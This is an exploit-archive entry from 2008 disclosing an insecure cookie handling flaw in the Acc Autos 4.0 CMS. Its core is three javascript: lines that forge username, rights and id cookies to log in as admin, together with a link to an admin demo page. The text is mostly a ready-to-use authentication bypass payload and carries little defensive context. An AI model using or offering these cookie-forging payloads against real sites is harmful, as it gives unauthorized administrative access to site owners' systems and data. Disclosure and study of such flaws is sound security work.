[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Acc Autos 4.0 Insecure Cookie Handling Vulnerability
# Published : 2008-11-03
# Author : x0r
# Previous Title : MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability
# Next Title : Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability
-==========================================-
Autore: x0r - Road Crew - Evolution Team
Cms: Acc Autos v4.0
Bug: Insecure Cookie Handling
Site: http://pro7.altervista.org/v2/
-==========================================-
Exploit:
[+]javascript:document.cookie="username_cookie=admin";
[+]javascript:document.cookie="right_cookie=1";
[+]javascript:document.cookie="id_cookie=1";
Live Demo:
http://www.accscripts.com/autos/demo/admin/
Greetz: 8102008..Il Sogni Diventa Realt??...Bimb4 Ti AmO.
# www.Syue.com [2008-11-03]